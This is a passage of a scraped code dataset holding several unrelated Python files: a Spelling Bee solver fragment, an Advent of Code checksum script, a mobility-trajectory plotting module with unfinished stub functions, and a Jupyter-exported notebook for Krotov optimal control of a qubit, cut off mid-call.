\"\\n\".join(foundPangrams)\n\n\napp = App(app_ui, server)\n","repo_name":"kennethjmyers/SpellingBeeSolver","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70556229970","text":"with open('day_02.txt', 'r') as file:\n\trows = [row.split('\\t') for row in file]\n\tfor i in range(len(rows)):\n\t\tfor j in range(len(rows[i])):\n\t\t\trows[i][j] = int(rows[i][j])\n\nchecksum_1, checksum_2 = 0, 0\nfor row in rows:\n\tchecksum_1 += max(row) - min(row)\n\tdone_with_row = False\n\tfor i in range(len(row)):\n\t\tfor j in range(1,len(row)):\n\t\t\tnumer, denom = row[i], row[(i+j) % len(row)]\n\t\t\tif numer % denom == 0 or denom % numer == 0:\n\t\t\t\tchecksum_2 += max(numer // denom, denom // numer)\n\t\t\t\tdone_with_row = True\n\t\t\t\tbreak\n\t\tif done_with_row:\n\t\t\tbreak\n\nprint('part 1 checksum: '+ str(checksum_1))\nprint('part 2 checksum: '+ 
str(checksum_2))\n","repo_name":"johnakitto/advent_of_code","sub_path":"2017/day_02.py","file_name":"day_02.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32428812551","text":"import os\nimport collections\nimport itertools\nimport numpy as np\nimport pickle as pk\nimport ruptures as rpt\nimport seaborn as sns\nimport scipy.stats as stats\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib.colors as colors\nfrom collections import Counter, OrderedDict, defaultdict\nfrom itertools import chain\nfrom matplotlib.ticker import AutoMinorLocator\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\nfrom statistics import mode\nfrom sklearn.linear_model import LinearRegression\nfrom scipy.stats import gaussian_kde\n\nimport utils as ut\nimport analysis as an\n\ncwd_path = os.getcwd()\n\ndef plot_visit_trajectory_outline(fullpath, nlocs, nagents_load=1000):\n \"\"\"\n Subplot 0: Scatter. Number of different visits vs. rho parameter.\n Subplot 1: Histogram. Number of different visits.\n Subplot 2: Scatter. Visit frequency for every location vs. rho parameter.\n Subplot 3: Histogram. Visit frequency.\n Subplot 4: Scatter. Top location visit frequency vs. rho parameter.\n Subplot 5: Histogram. Top location visit frequency.\n Subplot 6: Scatter. Home location visit frequency vs. rho parameter.\n Subplot 7: Histogram. Home location visit frequency.\n \"\"\"\n\n # Build trajectory data frame\n mob_df = an.build_trajectory_data_frame(fullname=fullpath, nagents_load=nagents_load)\n\n # Prepare data structures for plots\n nagents = nagents_load\n rho_a = np.zeros(nagents)\n freq_diff_visits_a = np.zeros(nagents)\n toploc_visits_a = np.zeros(nagents)\n home_visit_freq_a = np.zeros(nagents)\n loc_freq_visits_a = []\n\n # Compute data to be plotted\n for a in range(nagents):\n rho_a[a] = an.get_agent_rho(mob_df, a)\n \n traj_a = an.get_agent_trajectory(mob_df, a)\n t_max = len(traj_a)\n\n loc_freq_visits = []\n for l in traj_a:\n loc_freq_visits.append(an.compute_location_visits(traj_a, l))\n loc_freq_visits_a.append(loc_freq_visits)\n\n different_visits = len(set(traj_a))\n freq_diff_visits_a[a] = different_visits / t_max\n \n toploc = an.compute_most_visited_location(trajectory=traj_a)\n toploc_visits_a[a] = toploc[1] / t_max\n \n home = traj_a[0]\n home_visit_freq_a[a] = an.compute_location_visits(traj_a, home) / t_max\n\n # Prepare figure template\n fig, ax = plt.subplots(nrows=2, ncols=4, figsize=(20,8))\n title = 'Visits outline'\n fig.suptitle(title, fontsize=30)\n\n # SUBPLOT 00: Scatter. rho vs. freq_diff_visits_a\n ax[0, 0].scatter(rho_a, freq_diff_visits_a, color='teal')\n ax[0, 0].set_xlabel(r'$\\rho$', fontsize=25)\n ax[0, 0].set_ylabel(r'different visit rate $S/t_{{max}}$', fontsize=25)\n ax[0, 0].tick_params(axis='both', labelsize=15)\n\n # SUBPLOT 01: Histogram. freq_diff_visits_a\n density = True\n ax[0, 1].hist(freq_diff_visits_a, bins='auto', density=density, color='teal')\n ax[0, 1].set_xlabel(r'different visit rate $S/t_{{max}}$', fontsize=25)\n ax[0, 1].set_ylabel('norm. count', fontsize=25)\n ax[0, 1].tick_params(axis='both', labelsize=15)\n\n # SUBPLOT 02: Scatter. rho vs. 
loc_freq_visits_a\n max_locs = max(len(loc_freq_visits) for loc_freq_visits in loc_freq_visits_a)\n for a in range(nagents):\n rho_extend = np.full(max_locs, rho_a[a])\n ax[0, 2].scatter(rho_extend, loc_freq_visits_a[a])\n ax[0, 2].set_xlabel(r'$\\rho$', fontsize=25)\n ax[0, 2].set_ylabel(r'$f$', fontsize=25)\n ax[0, 2].tick_params(axis='both', labelsize=15)\n\n # SUBPLOT 03: Histogram. loc_frequ_visits_a\n flattened_loc_freq_visits = [visit for sublist in loc_freq_visits_a for visit in sublist]\n ax[0, 3].hist(flattened_loc_freq_visits, bins='auto', density=density, color='teal')\n ax[0, 3].set_xlabel(r'$f$', fontsize=25)\n ax[0, 3].set_ylabel('norm. count', fontsize=25)\n ax[0, 3].tick_params(axis='both', labelsize=15)\n\n # SUBPLOT 10: Scatter. rho vs. toploc_visits_a\n ax[1, 0].scatter(rho_a, toploc_visits_a, color='teal')\n ax[1, 0].set_xlabel(r'$\\rho$', fontsize=25)\n ax[1, 0].set_ylabel(r'$f_{{top}}$', fontsize=25)\n ax[1, 0].tick_params(axis='both', labelsize=15)\n\n # SUBPLOT 11: Histogram. toploc_visits_a\n ax[1, 1].hist(toploc_visits_a, bins='auto', density=density, color='teal')\n ax[1, 1].set_xlabel(r'$f_{{top}}$', fontsize=25)\n ax[1, 1].set_ylabel('norm. count', fontsize=25)\n ax[1, 1].tick_params(axis='both', labelsize=15)\n\n # SUBPLOT 12: Scatter. rho vs. home_visits_a\n ax[1, 2].scatter(rho_a, home_visit_freq_a, color='teal')\n ax[1, 2].set_xlabel(r'$\\rho$', fontsize=25)\n ax[1, 2].set_ylabel(r'$f_{{home}}$', fontsize=25)\n ax[1, 2].tick_params(axis='both', labelsize=15)\n\n # SUBPLOT 13: Histogram. home_visits_a \n ax[1, 3].hist(home_visit_freq_a, bins='auto', density=density, color='teal')\n ax[1, 3].set_xlabel(r'$f_{{home}}$', fontsize=25)\n ax[1, 3].set_ylabel('norm. count', fontsize=25)\n ax[1, 3].tick_params(axis='both', labelsize=15)\n\n plt.rcParams.update({'font.size': 15})\n plt.rc('axes', labelsize=20)\n plt.rcParams['xtick.labelsize'] = 20\n plt.rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n plt.rcParams['pdf.fonttype'] = 42\n plt.tight_layout()\n\n plt.show()\n\ndef plot_visit_number_frequency(pars):\n\n # Load grid data\n\n # Transform grid data into trajectory dataframe\n\n # Load epidemic data\n pass\n\ndef plot_total_visits(fullpath, nagents_load=1000):\n \"\"\"\n Subplot 0: Total visits in every location (lattice structure preserved).\n Subplot 1: How many agents have a every location as top location. (lsp).\n Subplot 2: Unique visits to every location (how many different agents).\n \"\"\"\n \n # Prepare figure\n\n # Figure settings\n pass\n \n plt.rcParams.update({'font.size': 15})\n plt.rc('axes', labelsize=20)\n plt.rcParams['xtick.labelsize'] = 20\n plt.rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n plt.rcParams['pdf.fonttype'] = 42\n plt.tight_layout()\n \n # Save plot\n full_path = os.path.join(path, lower_path)\n base_name = base_name\n extension_list = ['pdf', 'png']\n if not os.path.exists(full_path):\n os.makedirs(full_path)\n for ext in extension_list:\n full_name = os.path.join(full_path, base_name + '.' 
+ ext)\n plt.savefig(full_name, format=ext, bbox_inches='tight')\n plt.clf()\n\ndef plot_visit_frequency_and_attractiveness(full_path):\n \"\"\"\n Subplot 00: f_top-distribution for every agent\n Subplot 01: f_home-distribution for every agent\n Subplot 10: A_top-distribution for every agent\n Subplot 11: A_home-distribution for every agent\n \"\"\"\n \n pass\n \n plt.rcParams.update({'font.size': 15})\n plt.rc('axes', labelsize=20)\n plt.rcParams['xtick.labelsize'] = 20\n plt.rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n plt.rcParams['pdf.fonttype'] = 42\n plt.tight_layout()\n \n # Save plot\n full_path = os.path.join(path, lower_path)\n base_name = base_name\n extension_list = ['pdf', 'png']\n if not os.path.exists(full_path):\n os.makedirs(full_path)\n for ext in extension_list:\n full_name = os.path.join(full_path, base_name + '.' + ext)\n plt.savefig(full_name, format=ext, bbox_inches='tight')\n plt.clf()\n\ndef plot_first_time_visits(full_path):\n \"\"\"\n Subplot 00: Average visit time for every location\n Subplot 01: Average visit time of 25% visitors\n Subplot 02: Average visit time of 50% visitors\n Subplot 10: P25-time\n Subplot 11: P50-time\n Subplot 12: P75-time\n \"\"\"\n pass\n \n plt.rcParams.update({'font.size': 15})\n plt.rc('axes', labelsize=20)\n plt.rcParams['xtick.labelsize'] = 20\n plt.rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n plt.rcParams['pdf.fonttype'] = 42\n plt.tight_layout()\n \n # Save plot\n full_path = os.path.join(path, lower_path)\n base_name = base_name\n extension_list = ['pdf', 'png']\n if not os.path.exists(full_path):\n os.makedirs(full_path)\n for ext in extension_list:\n full_name = os.path.join(full_path, base_name + '.' + ext)\n plt.savefig(full_name, format=ext, bbox_inches='tight')\n plt.clf()\n\ndef plot_time_to_poles(full_path):\n \"\"\"\n Subplot 00: How many time to reach what became top location\n Subplot 01: How many time to reach 2-most visited\n Subplot 10: How many time to reach 50%-most visited\n Subplot 12: How many time to reach 75%-most visited\n \"\"\"\n pass\n \n plt.rcParams.update({'font.size': 15})\n plt.rc('axes', labelsize=20)\n plt.rcParams['xtick.labelsize'] = 20\n plt.rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n plt.rcParams['pdf.fonttype'] = 42\n plt.tight_layout()\n \n # Save plot\n full_path = os.path.join(path, lower_path)\n base_name = base_name\n extension_list = ['pdf', 'png']\n if not os.path.exists(full_path):\n os.makedirs(full_path)\n for ext in extension_list:\n full_name = os.path.join(full_path, base_name + '.' + ext)\n plt.savefig(full_name, format=ext, bbox_inches='tight')\n plt.clf()\n\ndef plot_rho_spatial_distribution(full_path):\n \"\"\"\n Subplot 0: spatial distribution\n Subplot 1: lower 95% CI\n Subplot 2: upper 95% CI\n \"\"\"\n pass\n \n plt.rcParams.update({'font.size': 15})\n plt.rc('axes', labelsize=20)\n plt.rcParams['xtick.labelsize'] = 20\n plt.rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n plt.rcParams['pdf.fonttype'] = 42\n plt.tight_layout()\n \n # Save plot\n full_path = os.path.join(path, lower_path)\n base_name = base_name\n extension_list = ['pdf', 'png']\n if not os.path.exists(full_path):\n os.makedirs(full_path)\n for ext in extension_list:\n full_name = os.path.join(full_path, base_name + '.' 
+ ext)\n plt.savefig(full_name, format=ext, bbox_inches='tight')\n plt.clf()\n\n\ndef main():\n\n lower_path = 'data'\n filename = \"mdyna_gm0.21_hw25_t1200_rmBeta_ra2_rb2_space_amGaussian_aa0_ab10_bmFinite_np50_pmRandomCartesian_x50_y50_ts230626184935.pickle\"\n fullpath = os.path.join(cwd_path, lower_path, filename)\n #mob_df = an.build_trajectory_data_frame(fullname=fullpath, nagents_load=50000)\n \n plot_visit_trajectory_outline(fullpath, nlocs=2500, nagents_load=1000)\n\n \nif __name__ == \"__main__\":\n main()\n\n\n\n\n\n\n","repo_name":"phononautomata/expidemics","sub_path":"src/plot_mobility.py","file_name":"plot_mobility.py","file_ext":"py","file_size_in_byte":10443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34708369593","text":"\n# coding: utf-8\n\n# # Optimization of qubit evolution\n\n# In[ ]:\n\n\n# NBVAL_IGNORE_OUTPUT\nget_ipython().run_line_magic('load_ext', 'watermark')\n#%load_ext autoreload\n#%autoreload 2\nimport qutip\nimport numpy as np\nimport scipy\nfrom ipywidgets import interact\nimport ipywidgets as widgets\nimport matplotlib\nimport matplotlib.pylab as plt\nimport krotov\nimport os\nimport copy\nimport subprocess\nfrom bisect import bisect_left\nimport matplotlib2tikz\nfrom scipy.signal import savgol_filter\nget_ipython().run_line_magic('matplotlib', 'notebook')\nget_ipython().run_line_magic('watermark', '-v --iversions')\nπ = np.pi\nsqrt = np.sqrt\nbasis = qutip.basis\ntensor = qutip.tensor\ncoherent = qutip.coherent\nfrom datetime import datetime\ndef current_time():\n return datetime.now().isoformat()[:16].replace('T',' ')\n\n\n# In[ ]:\n\n\nL = 3 # Truncated Hilbert space size\n\n\n# # Plotting and helper functions\n\n# In[ ]:\n\n\ndef to_two_level(state):\n if state.type == 'oper':\n return qutip.Qobj(state[0:2,0:2])\n else:\n return qutip.Qobj(state[0:2])\n\ndef plot_population(n, tlist):\n fig, ax = plt.subplots(figsize=(7.5,4))\n leg = []\n for i in range(len(n)):\n ax.plot(tlist, n[i], label=str(i))\n leg.append(r'$|'+str(i)+'\\rangle$')\n ax.legend()\n ax.set_xlabel('Time (ns)')\n ax.set_ylabel('Occupation')\n ax.legend([r'$|0\\rangle$',r'$|1\\rangle$',r'$|2\\rangle$'])\n #plt.show(fig)\n return fig\n\ndef plot_pulse(pulse, tlist, T=None, fig=None):\n if fig is None:\n fig, ax = plt.subplots(figsize=(7.5,4))\n else:\n ax = fig.axes[0]\n if callable(pulse):\n pulse = np.array([pulse(t, args=None) for t in tlist])\n if np.any(np.iscomplex(pulse)):\n ax.plot(tlist, np.real(pulse))\n ax.plot(tlist, np.imag(pulse))\n ax.legend(['Re', 'Im'])\n else:\n ax.plot(tlist, pulse)\n if T is not None:\n ax.plot(tlist, [S(t, T) for t in tlist], color='k', linestyle='--', linewidth=1)\n ax.plot(tlist, [-S(t, T) for t in tlist], color='k', linestyle='--', linewidth=1)\n ax.set_xlabel('Time (ns)')\n ax.set_ylabel('Pulse amplitude')\n ax.set_ylim([-pulse_max(0)*1.05,pulse_max(0)*1.05])\n #plt.show()\n return fig\n\ndef plot_system(ψ):\n bl = qutip.Bloch()\n bl.add_states(to_two_level(ψ.ptrace(0)))\n bl.show()\n qutip.visualization.plot_wigner_fock_distribution(to_two_level(ψ.ptrace(1)))\ndef plot_resonator(ψ):\n fig, ax = plt.subplots(1,len(ψ), figsize=(3*len(ψ),3))\n if len(ψ)<=1:\n ψ = ψ[0]\n axis = ax\n qutip.visualization.plot_wigner(ψ.ptrace(1), fig=fig, ax=axis, alpha_max = 2*α)\n axis.axis_equal = True\n else:\n for (ϕ, axis) in zip(ψ, ax):\n qutip.visualization.plot_wigner(ϕ.ptrace(1), fig=fig, ax=axis, alpha_max = 2*α)\n axis.axis_equal = True\n \ndef plot_cardinal(ψ):\n bl = qutip.Bloch()\n 
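# one color per cardinal-state vector, assigned in matching pairs\n 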
bl.vector_color = ['r','g','b','g','b','r']\n [bl.add_states(to_two_level(ϕ.ptrace(0)), 'vector') for ϕ in ψ]\n bl.show()\n return bl\n\ndef plot_all(dyn, ψ):\n ψ_i = [g.states[0] for g in dyn]\n ψ_f = [g.states[-1] for g in dyn]\n ψ_t = [ϕ[1] for ϕ in ψ]\n plot_cardinal(ψ_i)\n plot_resonator(ψ_i)\n plot_cardinal(ψ_t)\n plot_resonator(ψ_t)\n plot_cardinal(ψ_f)\n plot_resonator(ψ_f)\ndef plot_evolution(dyn, steps=1):\n for d in dyn:\n points = [to_two_level(s) for s in d.states[0:-1:steps]]\n bl = qutip.Bloch()\n bl.vector_color = 'r'\n bl.point_color = 'r'\n bl.point_marker = 'o'\n bl.add_states(points, 'point')\n bl.show()\n #bl = qutip.Bloch()\n #bl.vector_color = 'r'\n #bl.point_color = 'r'\n #bl.point_marker = 'o'\n #bl.view = [bl.view[0], 80]\n #bl.add_states(points, 'point')\n #bl.show()\n return bl\ndef get_objectives(T=None):\n if use_rotating:\n objectives = [krotov.Objective(initial_state=ψ[0], target=ψ[1], H=H) for ψ in state_rot(ϕ, T)]\n else:\n objectives = [krotov.Objective(initial_state=ψ[0], target=ψ[1], H=H) for ψ in ϕ]\n return objectives\ndef plot_matrix_final_target(target_state, final_state, xlabels, ylabels, el=30, az=135):\n fig, ax = qutip.visualization.matrix_histogram(final_state * target_state.dag(), xlabels, ylabels, colorbar=False, limits=[-1,1])\n qutip.visualization.matrix_histogram(proj(target_state), xlabels, ylabels, colorbar=False, limits=[-1,1], fig=fig, ax=ax)\n facecolors = np.zeros((6*L**2,4))*0.1\n edgecolors = np.tile([0,0,0,0.9], (6*L**2,1))\n ax.get_children()[2].set_facecolors(facecolors)\n ax.get_children()[2].set_edgecolors(edgecolors)\n ax.set_zticks(np.arange(-1,1,0.25))\n ax.view_init(elev=el, azim=az)\n return (fig, ax)\n\n\n# In[ ]:\n\n\ndef F_oc(fw_states_T, objectives, tau_vals=None, **kwargs):\n return np.abs(krotov.functionals.f_tau(fw_states_T, objectives, tau_vals, **kwargs))**2\n\ndef calc_fidelity(tau_vals):\n return np.abs(np.sum(tau_vals)/len(tau_vals))**2\n\ndef print_fidelity(**args):\n fid = calc_fidelity(np.array(args['tau_vals']))\n print(\" F_t = {} | F = {} | F_t - F = {}\".format(F_oc_tar, fid, F_oc_tar-fid))\ndef plot_fid_convergence(info_vals):\n fig, ax = plt.subplots(1,1)\n ax.plot(info_vals)\n ax.set_xticks(np.arange(0, len(info_vals), step=1))\n ax.set_xlabel('Iteration')\n ax.set_ylabel('Fidelity')\n #ax.set_ylim((-0.2,.2))\n plt.show()\ndef plot_fid_convergence(ax, info_vals, T):\n ax.plot3D(range(0,len(info_vals)), [T]*len(info_vals), info_vals)\n\n\n# In[ ]:\n\n\ndef qubit_occupation(dyn):\n occ = [basis(L,i)*basis(L,i).dag() for i in range(0,L)]\n n = qutip.expect(occ, dyn.states)\n fig = plot_population(n, dyn.times)\n return fig\n\ndef plot_norm(result):\n state_norm = lambda i: result.states[i].norm()\n states_norm=np.vectorize(state_norm)\n\n fig, ax = plt.subplots()\n ax.plot(result.times, states_norm(np.arange(len(result.states))))\n ax.set_title('Norm loss', fontsize = 15)\n ax.set_xlabel('Time (ns)')\n ax.set_ylabel('State norm')\n plt.show(fig)\n\n\n# In[ ]:\n\n\ndef plot_spectrum(pulse, tlist, mark_freq=None, pos=1, xlim=None, mark_color=['k','k','k'], fig = None, col=[0,0,0]):\n if fig is None:\n fig_new = True\n fig, ax = plt.subplots(figsize=(10,5))\n else:\n fig_new = False\n ax = fig.axes[0]\n samples = len(tlist)\n sample_interval = tlist[-1]/samples\n power_two = 2**20\n signal_qubit = np.pad(pulse, (0, power_two-samples), mode='constant')\n samples = power_two\n \n time = np.linspace(0, samples*sample_interval, samples)\n\n signal_spectrum = np.fft.fftshift(np.fft.fft(signal_qubit))\n freqs = 
np.fft.fftshift(np.fft.fftfreq(samples, d=sample_interval))\n\n \n start_idx = bisect_left(freqs, xlim[0]/(2*π))\n end_idx = bisect_left(freqs, xlim[1]/(2*π))\n ax.plot(freqs[start_idx:end_idx+1], np.abs(signal_spectrum[start_idx:end_idx+1])/len(signal_qubit),color=col) # in GHz\n if mark_freq is not None and fig_new is True:\n if not isinstance(mark_freq, list):\n mark_freq = [mark_freq]\n mf = np.array(mark_freq)/(2*π)\n if pos==1:\n ax.set_xlim(0, 2*mf[0])\n elif pos==-1:\n ax.set_xlim(-2*mf[0], 0)\n elif xlim is not None:\n ax.set_xlim(xlim[0]/(2*π), xlim[1]/(2*π))\n [ax.axvline(x=m_f, ymin=0, ymax=1, color=col, linestyle='--', linewidth=1) for (m_f, col) in zip(mf, mark_color)]\n #[ax.axvline(x=m_f, ymin=0, ymax=1, linestyle='--', linewidth=1) for (m_f, col) in zip(mf, mark_color)]\n ax.set_title('Pulse spectrum')\n ax.set_xlabel('f (GHz)');\n return fig\n\n\n# In[ ]:\n\n\ndef fid(result, target):\n return (np.abs((result.states[-1].dag()*target).full())**2)[0][0]\ndef proj(ψ, ϕ=None):\n if ϕ is None:\n return ψ * ψ.dag()\n else:\n return ψ * ϕ.dag()\n\n\n# In[ ]:\n\n\ndef plot_results_3d(results):\n fig = plt.figure()\n ax = plt.axes(projection='3d')\n ax.set_xlabel('Iteration')\n ax.set_zlabel('Fidelity')\n ax.set_ylabel('Pulse length')\n ax.set_zlim(0,1.1)\n for (r, T) in results:\n plot_fid_convergence(ax, r.info_vals[1:], T)\n ax.view_init(elev=20, azim=340)\n return (fig, ax)\n\ndef plot_results_iteration(results):\n fig = plt.figure()\n ax = plt.axes()\n ax.set_xlabel('Iteration')\n ax.set_ylabel('Fidelity')\n for (r, T) in results:\n ax.plot(range(0,len(r.info_vals)-1), r.info_vals[1:])\n #print('F = {}'.format(r.info_vals[-1]))\n return (fig, ax)\n\ndef plot_results_pulse_length_iterations(results):\n fig = plt.figure()\n ax = plt.axes()\n ax.set_xlabel('Pulse length (ns)')\n ax.set_ylabel('Iterations')\n x = [T for (r,T) in results]\n y = [r.iters[-1] for (r,T) in results]\n ax.stem(x, y)#, linestyle='None', color='k',marker='.')\n return (fig, ax)\n \ndef plot_results_pulse_length(results, iteration=-1, ax=None, shape='o',color='k'):\n if ax is None:\n ax = plt.axes()\n #else:\n #ax.clear()\n ax.set_xlabel('Pulse length')\n ax.set_ylabel('Fidelity')\n \n T_list = [T for (r, T) in results]\n fid_list = [r.info_vals[min(len(r.info_vals)-1,iteration)] for (r, T) in results]\n #for (r, T) in results:\n # it = \n \n ax.plot(T_list, fid_list, shape+color)\n ax.set_ylim(0,1.1)\n return ax\n\n\n# In[ ]:\n\n\ndef pulse_max(σ):\n A = 1.56246130414 # Chosen such that the integral of any Blackman pulse = π\n #A = A/2\n #A = 0.1\n σ = np.max((σ,3))\n return A/(np.sqrt(2*π)*σ)\n\n\n# # System setup\n\n# In[ ]:\n\n\nσ_max = 3 # ns (Gaussian pulse limit)\namp_max = pulse_max(0)\n# Below are settings for testing, optimization settings are set in the optimization section\nT = 18*2\nσ = T/6\nsteps = 4*int(np.ceil(T))\ntlist = np.linspace(0, T, steps)\n\n\n# ## Hamiltonian function\n\n# In[ ]:\n\n\nSi = qutip.operators.identity(L)\nZERO = qutip.operators.qzero(L)\n\nσ_z = proj(qutip.basis(L, 0)) - proj(qutip.basis(L, 1))\nσ_y = 1j*(proj(qutip.basis(L, 1),qutip.basis(L, 0)) - proj(qutip.basis(L, 0), qutip.basis(L, 1)))\nσ_x = proj(qutip.basis(L, 0),qutip.basis(L, 1)) - proj(qutip.basis(L, 1), qutip.basis(L, 0))\nb = qutip.operators.destroy(L)\nI = Si\n\nω_r = 8.3056 * 2 * π # resonator frequency\nω_q = 6.2815 * 2 * π # qubit frequency\nK_q = -2*π*297e-3 # Kerr qubit 200-300 MHz\n\n\nω_ef = ω_q + K_q\nω_gf = ω_q + K_q/2\n\nuse_rotating = True\ndef hamiltonian(ω=1.0, ampl0=1, use_rotating=True, 
pulses=None, tlist=None, start_pulse=None, T=1, phase=0, σ=σ):\n \"\"\"Two-level-system Hamiltonian\n \n Args:\n ω (float): energy separation of the qubit levels\n ampl0 (float): constant amplitude of the driving field\n \"\"\"\n \n K_r = 2*π*0.45e-3 # Kerr res\n #K_q = -2*π*297e-3 # Kerr qubit 200-300 MHz\n ω_r = 8.3056 * 2 * π # resonator frequency\n ω_q = 6.2815 * 2 * π # qubit frequency\n χ = 0.025 * 2 * π # parameter in the dispersive hamiltonian\n\n Δ = abs(ω_r - ω_q) # detuning\n g = sqrt(Δ * χ) # coupling strength that is consistent with chi\n γ = 1e1 # Dissipation (unused)\n \n #H_occ = w_r*a.dag()*a + w_q*b.dag()*b\n if L==3:\n H_occ_q = qutip.Qobj(np.diag([0, ω_q, 2*ω_q]))\n else:\n H_occ_q = qutip.Qobj(np.diag([0, ω_q]))\n #H_occ_r = ω_r * a.dag()*a\n H_occ = H_occ_q# + H_occ_r\n \n \n use_dispersive = True\n use_kerr = True\n #if use_dispersive:\n # #H_coup = - chi_qr * a.dag()*a * b.dag()*b\n # H_coup = χ * (a.dag()*a + I/2) * σ_z\n #else:\n #H_coup = g * (a.dag() * b + a * b.dag())\n # H_coup = g * σ_x *a.dag() + a\n if use_kerr:\n H_kerr = + K_q/2 * b.dag()**2 * b**2\n else:\n H_kerr = ZERO\n \n H_d = ZERO\n \n if use_rotating:\n H_d += H_kerr\n \n H_qr = (b.dag() + b)\n H_qi = 1j*(b.dag() - b)\n #H_rr = (a + a.dag())\n #H_ri = 1j*(a.dag() - a)\n \n if start_pulse is None:\n ϵ_qr = lambda t, args: ampl0\n ϵ_qi = lambda t, args: ampl0\n else:\n ϵ_qr = shape_field(lambda t, args: ampl0, start_pulse, T, σ)\n ϵ_qi = shape_field(lambda t, args: ampl0, start_pulse, T, σ)\n #ϵ_rr = lambda t, args: ampl0\n #ϵ_ri = lambda t, args: ampl0\n \n # Random pulses (doesn't really work)\n #ϵ = lambda t, tlist, R: R[np.where(tlist<=t)[0][-1]]\n #O = np.random.rand(len(tlist))\n #ϵ_qr = lambda t, args: ϵ(t, tlist, O)\n #O = np.random.rand(len(tlist))\n #ϵ_qi = lambda t, args: ϵ(t, tlist, O)\n \n \n if pulses:\n ϵ_qr = pulses[0]\n ϵ_qi = pulses[1]\n # ϵ_rr = np.zeros(len(pulses[0]))\n # ϵ_ri = np.zeros(len(pulses[0]))\n\n return [H_d, [H_qr, ϵ_qr], [H_qi, ϵ_qi]]#, [H_rr, ϵ_rr], [H_ri, ϵ_ri]]\n else:\n H_d += H_occ + H_kerr#+ H_coup\n \n H_q = b\n H_qc = b.dag()\n #H_rr = ZERO\n #H_ri = ZERO\n \n\n ϵ_q = lambda t, args: 1j*ampl0*np.exp(1j*ω_q*t)\n ϵ_qc = lambda t, args: -1j*ampl0*np.exp(-1j*ω_q*t)\n #ϵ_rr = lambda t, args: ampl0\n #ϵ_ri = lambda t, args: ampl0\n \n if pulses:\n ϵ_q = pulses[0]\n ϵ_qc = pulses[1]\n #ϵ_rr = np.zeros(len(pulses[0]))\n #ϵ_ri = np.zeros(len(pulses[0]))\n \n return [H_d, [H_q, ϵ_q], [H_qc, ϵ_qc]]#, [H_rr, ϵ_rr], [H_ri, ϵ_ri]]\n\n# Converts basis state coefficients into the corresponding states of the qubit-resonator system \ndef coeffs_to_state(c,init = True):\n if init:\n ψ = tensor((c[0]*basis(L,0) + c[1]*basis(L,1)).unit() , (basis(N,0)))\n else:\n ψ = tensor((basis(L,0)) , (c[0]*cat_0 + c[1]*cat_1).unit())\n return ψ\n\n# Feeds a list of coeffients into the function above\ndef states(coeffs):\n return [[coeffs_to_state(c,True),coeffs_to_state(c,False)] for c in coeffs]\n\n\n# In[ ]:\n\n\nH = hamiltonian(ampl0=1, use_rotating=True, phase=np.exp(-1j*ω_q*T))\nϕ = [[ basis(L,0), basis(L,1) ]] # Initial and target state\nF_err = 1e-5 # Infidelity goal\nF_oc_tar = 1-F_err # Fidelity goal\n\n\n# Next, we define the optimization targets, which is technically a list of\n# objectives, but here it has just one entry defining a simple state-to-state\n# transfer\n# from initial state $\\ket{\\Psi_{\\init}} = \\ket{0}$ to the target state\n# $\\ket{\\Psi_{\\tgt}} = \\ket{1}$, which we want to reach at final time $T$. 
Note\n# that we also have to pass the Hamiltonian $\\op{H}(t)$ that determines the\n# dynamics of\n# the system to the optimization objective.\n\n# In[ ]:\n\n\n# Rotates the target states into the rotating frame\ndef state_rot(ϕ, T):\n ϕ = copy.deepcopy(ϕ)\n if np.sum(np.array(ϕ[0][1].full())==0) != L-1:\n if L == 3:\n rot_evo = qutip.Qobj([[1, 0, 0],[0, np.exp(-1j * ω_q * T), 0],[0, 0, 0]])\n else:\n rot_evo = qutip.Qobj([[1, 0],[0, np.exp(-1j * ω_q * T)]])\n \n ϕ[0][1] = rot_evo * ϕ[0][1]\n return ϕ\n\nif use_rotating:\n objectives = [krotov.Objective(initial_state=ψ[0], target=ψ[1], H=H) for ψ in state_rot(copy.deepcopy(ϕ), T)]\nelse:\n objectives = [krotov.Objective(initial_state=ψ[0], target=ψ[1], H=H) for ψ in ϕ]\n\n\n# In[ ]:\n\n\ndef S(t, T=6*σ, σ=σ):\n rise_time = 2\n return amp_max*krotov.shapes.flattop(t, t_start=0, t_stop=T, t_rise=rise_time, t_fall=rise_time, func='sinsq')\n\ndef start_pulse(t, T=6*σ, σ=σ):\n if σ is not None:\n return pulse_max(σ)*krotov.shapes.blackman(t, t_start=0, t_stop=6*σ)\n else:\n return krotov.shapes.blackman(t, t_start=0, t_stop=T)\ndef zero_pulse(t, T=T, σ=4):\n return 0\ndef unit_pulse(t, T=T, σ=4):\n return 1\n\ndef shape_field(ϵ, sf, T, σ):\n \"\"\"Applies the shape function S(t) to the guess field\"\"\"\n ϵ_shaped = lambda t, args: ϵ(t, args)*sf(t, T=T, σ=σ)\n return ϵ_shaped\n\nS_unit = [unit_pulse,unit_pulse]\nS_zero = [zero_pulse,zero_pulse]\nS_start = [lambda t, T=T, σ=σ: 0.01*unit_pulse(t, T=T, σ=σ),start_pulse]\nS_start = [zero_pulse, start_pulse]\nS_funs = [S,S]\nfor i, H_i in enumerate(H[1:]):\n H_i[1] = shape_field(H_i[1], S_start[i], T, σ)\n\n\n# ## Simulate dynamics of the guess pulse\n# \n# Before heading towards the optimization\n# procedure, we first simulate the\n# dynamics under the guess pulses.\n\n# In[ ]:\n\n\nfor H_i in H[1:]:\n plot_pulse(H_i[1], tlist)\n\n\n# In[ ]:\n\n\nguess_dynamics = [ob.mesolve(tlist, progress_bar=True, options=qutip.Options(nsteps=50000)) for ob in objectives]\n\n\n# In[ ]:\n\n\nqubit_occupation(guess_dynamics[0])\n\n\n# In[ ]:\n\n\nplot_evolution(guess_dynamics, 